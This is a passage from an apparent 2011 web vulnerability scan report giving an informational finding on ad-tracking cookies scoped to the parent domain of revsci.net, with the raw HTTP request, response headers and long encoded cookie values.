TpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; rsi_us_1000000="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"; udm_0=MLv3NCEpbgpn34xwb+t4i0a3cgXtVLCla0EkErcT0mFBLMnR0C8SwiSd9pwq6b/urQy6uwL5rPtS5VxWx3Av+lIK0Lkpaj4N0MO2DnhUU4jP9xhTmoHoo0Y+f+q8hN+oFLyOmbud0hz+jq+cMwoghUynYwrgNtd+Agap/FTLc7CKGnJlB+2sP1urgbhTgD8dotZ4m56OVucAdbLbNgNMDtOQq9gJGEepfG8VW1Q9a5rIwEWo6XIMCluZo5KWK7KJpXdKAuMdT0asQPYcVvVrO2UUzxrvO5ZVIHEgPywOJ5do5WC2Q0/NcF2shDO+QqXWJdbX0OqMCfCp/uF1DI8mTtMKSOzEDgZLk+53ghmHpNlezwaRq24n3yk1axI/i4b0N9csYVpsaAUU4uyKMoWlj00kD3c2UwUiXRlylO9GVaUWDOdxl1h2tF635L8pmba2LwiVetWos0VrtRJlUmO1ehLqwSW4EKEEcT1d1To6b4bDwQqyboO20/CC91ImnZSY7f4dk+Fkg0a/iqt7HSzUf2P/bKQuLhMJR4Knq3s8RacbfTWCuKlYBEJAz+C2bkNJqUf4oZaeXZGWBH99QC8Kq3iPoMvS6/eEAZXXF25Cc5tiWi6bvIzGGduB4chYRZXmCwczXutrmI0mdYim/t0EiV3MiddLLCiwPdaARbD+dleQ7aYZZc0IWJDrUAUoqq6BNFHqZQOaoMq0c2Vdvfoyq2gE65uykjGK8DI0fQ6W0LZV/KMW+bsDCKsOfz+Ch73anSmjzQ4N2mtfQACJzfk9EWBNM9K5yTbQDP/ZDJ/8zYyErcuaX/MTs1RU5N5DeU0aAmkpYJ9thW/Hya0qFvYladCiAuWtUPOrqpcyHKJPhFT9S9HCVHVMj3nZyx0z/91FO96gSu1bjwC1k54v0ek3ge3GY4Tosdejf4GUDkRMDeGtP/O/P23UhOcwcG29rPMIxD0imB5ApBEJHRsYN43ewlfT9vlcTTPx3Qihj66o/Chm4BPtAk9t25PfQLvbLkRSsruCX9+OdKjyYq+SzvBRWlhHPO8ZSqSXntrC0QOntJkQEIKIuYAC6+qY93TunGvCP99YcUu3CJVkmsbYN+Z5/84Q1V3ByyguogZxtBkUNrBOObpCkTAXnHmtBZu5Kqm7rHy9fTkErq2IhUY1YJqszajUzu0pnqOVrr8jTIo2TEJtgt3BdnvhPEhCLoK/tNiYa8XArAO/qbLAzFHFwe3eti49gHeYkMoRyy6gVrH5qdgFcqa0YlQJiQ8XgE2XCYqnJsDnGrEFxVz5s8Y6t369w9ih76FWbImv5nAazRPQE+R15Ge7Ar1R2tkE7fuLhxj0De9ywsX84Hqjq0nGEK4HZczwHAWH7HMyIqhm4sGgPjSpwGvB8dhrk2yXb7nG3qYnMLWeIXiuyNlCi5rjvnpEfQBOFLGvK9HN8srFj0xIopOeHeqR+QvHGiHzBpPF

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gxm3=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5Dmj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2rEO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4zOheXIMH/C1v6FY5Pio22rQpqLOQoPYd+GAD9VybyI+F4QNbwPPyvr8UGBZ6Vjnvedz63aa7pnxc5JCqQR+k2XOvNLfrCxC41VqqLiodbQjQZqBJei4H2TQvkinqMG8kBtM1kg38//fE0fhbl4QK/GL4tvC3vzfaUVMGHcMdGNMZDiIp4XW2dfAgHAn0AB43JJkmIRNHpWmlV7EGVMQOAUZTY3DQWOclImVvDGQzJdNDr9N803R6yNbqW2d3xDmBVK5G8Y5QNpT84suIacDxFRWhiYiXxb6RcnJUO2n/LXfOLncVWRHBhWNCNIPk4gU4G3WJWfrTzaR0w/9p8kAZYw/qSf0HduMZyRYt6LR1bdMVxUQzgDYC/ga7q1aqSAbYdYG+o469SYWL9OMk8vxEHcb637CHu1UrWG39L+tr8mGcL7imea6BA9t/9jx6c5vIunljkjwSkw7oZE6c9cxHJE3u6ZSqe5K7ULm42XLRCJg12GrcbV5R4Evkk8Eh3y8428t+dZDhkKZQfs6pQGSlwp/5wH0C/76A2MS1Et9/oXJ3c2aaIwXyMJ257RRIFcfpL1U2s4woUYUay7tTLmnBowyx/SmoO5VF7gHr3EqVITLWizD+JwSwrv3jkfgWAvJMCSFEmiAl6KPZbHNG37jgXCVku1jpFl4dQ8nZk9rn2v9l3cmZ2Ze33QfideBivuvdgt2Q0Ajm7NbHTt27ZRnHqp2Ze2QrczWEeEx7EO+FRH1TYLkFj7bxPfWgnX9H/Az/z5Qgw==; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:35 GMT; Path=/
Set-Cookie: rtc_dIjc=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; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:35 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:34 GMT
Content-Length: 886

/* AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC) */
rsinetsegs=['D08734_70056','D08734_70065','C07583_10165','C07583_10166','C07583_10174'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

13.82. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4z+huXIMH/C1v6FY5BD9CU6du67BSrLzzGDKYyVi7wuMG8EbAQsYoAM+8HjFdJuNxGA3/+CrpcbtEHZ/d6C7jbvv7M0vNWHRu7UTOWGMPgDtQnUJM+3UN3RAdHmCWWZdidYJ29FVf84FRt54yfn0DxXbewqnOCDFkhcpfrbm9qrWCYvAexDPzC3J2PvZfsy0paqKtZwkSPNwYDH58Nnxwd6fWe5R4HtXeze5eYPpOFwxneozVU7HcSJhRznJKY+nbXFV4Kh9TuLjJidiEALKqZqYEUfWBBwCHLNgWNCsDVbbrOurIU2np0szXUis/sUiQzf0Wf6hEdcVHk25x1YopVaDeVCwaNCIsECWnmpdYStYgcflX2fOyqpvQXpFuKLMZM26a7Cnv+bGk86zFfrtsmZ+XUjOCjCgV9VZAJLI6r/wby1TkeEYM4aKVRAcjOSNaSUouN6aq0UDfofVwofJbdaDfqnlskad6jL2nkV2oqYYN51bbjRrBJ5Zx/iFkNxeA80dBln8t7npPdnnutFI020xW6Pikz/y3wzF3Zn7ODNfmnnrXoxV2IA89MfIixDVxod6TnBvbAyjrHfxPZXpR9VpSkdunpDbZbQ0tkL4iwjlo4ovwa0wlZD7dl0qzpqpDVDzgG/K5a0fKdDgHqN06JXJDXihsaxG61k8V69rDg9gZRx72LYSDFbS+5iLzyhgdsmnsBb9i/GVpAizi/0VFp8PPCMlLuz7hDOGo+yUwLowBr0K6Cp6; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:40 GMT; Path=/
udm_0=MLv3NyEJZgpn3xSpL5u85NM5XwnsM3MjKdVcqB/a12JILatz1/QkamTspbLrwKiJ0kHW/5AU3oTEjmWXYWp2M0xUL7+WY6kjOrURsVDi62hpYV7xR6QBhj0v+pyJD3OJXK+vmR6dmK3bv866m5dV/8S0o9vxNmpKALSQclbLyFOiUbYzEkzSx6gD/xYdErrYRbvJrxQrHocSZW8IWgCBo1ZMKF3XAoyFrdWONbkKqPtnL+Tf6LeOnc/8RbibirISpR8EIRZg0bai/lhsQDUpwOFeZfVq4ADms+6bYXKqD9JyHXg0ZwDRrCWhBl1ue1BqVAn3Cr/Bwx8/fgf4osdRhn5YjD5/Y+PY6RExqP8RcxgTNdXx9V9Xq7fP8/CxpD2d4Ncg3Lwb6WRoh1vRm87/tMbWsUCyqUEjHcs9AEPUYjcC1xfTW9GtjTlaABUuUrmGg2itWP7OmRmHnGY1AG7z8DLn/+VDv99nV2ZqSoL3ECBGo5Gp+CmR/+82s/rVel/YnKz/XNzeezOmflNl/ISF2iEFYbSKl4jL2Imw3DcEFYr9gLF7thJxa959CXKjgznlBeDDDam6bQwtXdKwxq68WOD0JfNzPCFtxZ/3ySVIchlyyEMGK4ru9sNL2qhk7ThVsbKzGx3w5WC0tnxRyUM3wF7AFcroI1cVBCQX8UDlCNyuqP1eE9UH0lr8hQ9hH+eytjUTNHl50185XTe8k2I3KTCCC3V/1YUfM3sjwXon8qbgHnWylig/Q/P3gvmTN1uk6+gMf23SzvcZzS2JaZu1hhHc+zLEUQhUX2B2WD2Z1IAQyoj7hwalxN8UjEjE7dDYbkp4UpLD0vea8xMx8AwMSMuOMW+Z2BchxPI3ARZVxVwzU05RiwmP6YN1SIAvcXyk/FKuWo/NY4fTMv4mW6J5GkV7KsoK7zESEFXHC80l/FUrlSjwrgH0F9A4HdrSoCRnacUxrlabJk/bO0nQFQyClplYm45GteUUvB/yFXNWhchR5qNmBBeTnsuLjYG2ZjDj6+gYIPScc6ZJn5y6xJkKyqQDU5eYo9ZDplLH4wjRzgjncZs4b1iuMC4fjmTdUR2cDevLyGC3/dRJ9CcLuov2969ADUaV4qAQC5BiHySEoWnqc2ShEOSXAgSIgS+Eyh1EA8cPHs3CbYp/uQxx+SM1MwVT6OSTygbQTsYBbCJypY6WyLXo8mxytLhWadmEeayScWgFbHGuePFAPRquVFh96dbbF5M9RbLfAuQyLYtEa3eG+mkoAieeEZCt2m5a7NTx+Uc439ZXTiwJlFAahJEUocKPD9gyhsQNp2rpsEhJ5rdXhEIM/fln0zgalBbUBFpcvKtyWA77bjY7eCKH+sdgen0EQayIsR5HPAfq1y0RBst2xOjuOSxHlOrL8RmhvQ35RlgS+Gu73AjceiwRh0Gx1dj9Xu8+xiv2kDaH6RU9nKl1BpSf7tIpjrzjwxE1fe8GeNTkLApO3Ur7SMEtDlGU5e5U7wmQj6TKeaRm1dY/vSYq5TyKIflCXtQZmxEGf//KOjvsyVR3ZP7NK8+AbLMCSQD/OBWjetrucXmOEL9RMLrHQxXH9Vv+WOn5ixorNpStZnFCUQfrej5ibwjEcSVi1fs/7GL5+pUQywVqWob0fcbGF9zOLQJ+tj/rvPzhJXq0YA4x44xOK4w+z2tzIqlkpP+ikADD0I5fH5/0uGt4NbQGMW+JgHWCG9VlVWXq4Fy2CDkyduwyGzBgAyNcK2AcbCUfHePahhOHbixQW0gkUIyYnNVjqJn0tZ9IIQWmk2ynyVd+Eo3kixBSz6KvdGSg8RlOtZl3zHXogg==; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:40 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=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